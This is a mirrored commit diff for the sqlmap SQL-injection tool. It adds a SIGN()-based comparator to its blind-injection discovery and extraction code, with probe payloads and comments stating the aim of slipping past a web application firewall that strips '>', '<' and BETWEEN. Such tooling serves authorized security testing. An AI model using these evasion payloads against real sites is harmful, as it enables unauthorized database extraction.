mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-04 14:55:40 +00:00
Expanding Esperanto engine with SIGN
This commit is contained in:
parent
9925adf799
commit
e8512c8c13
3 changed files with 8 additions and 1 deletions
|
|
@ -429,6 +429,11 @@ class _Discovery(object):
|
|||
elif self._ask("2 BETWEEN 2 AND 3") and not self._ask("5 BETWEEN 2 AND 3"):
|
||||
self._comparator = "between"
|
||||
self.dialect.notes.append("'>' unusable; bisecting via BETWEEN")
|
||||
elif self._ask("SIGN(2-1)=1") and not self._ask("SIGN(2-3)=1") and not self._ask("SIGN(2-2)=1"):
|
||||
# ordered, log2-efficient, yet needs NO comparison operator (only SIGN(), '-', '=') -
|
||||
# survives a WAF stripping '>' AND '<' AND BETWEEN, without dropping to slow membership
|
||||
self._comparator = "sign"
|
||||
self.dialect.notes.append("'>'/BETWEEN unusable; bisecting via SIGN() (no comparison operator)")
|
||||
else:
|
||||
self._comparator = "membership"
|
||||
self.dialect.notes.append("no ordered comparator; using order-free IN() subset bisection")
|
||||
|
|
|
|||
|
|
@ -133,6 +133,8 @@ class _Extraction(object):
|
|||
# BETWEEN expresses the same range test without the '>'/'<' a WAF may strip.
|
||||
if self._comparator == "between":
|
||||
return self._ask("%s BETWEEN %d AND %d" % (expr, n + 1, high))
|
||||
if self._comparator == "sign":
|
||||
return self._ask("SIGN((%s)-(%d))=1" % (expr, n))
|
||||
return self._ask("%s>%d" % (expr, n))
|
||||
|
||||
def _numDefined(self, expr):
|
||||
|
|
|
|||
|
|
@ -20,7 +20,7 @@ from lib.core.enums import OS
|
|||
from thirdparty import six
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.10.7.169"
|
||||
VERSION = "1.10.7.170"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue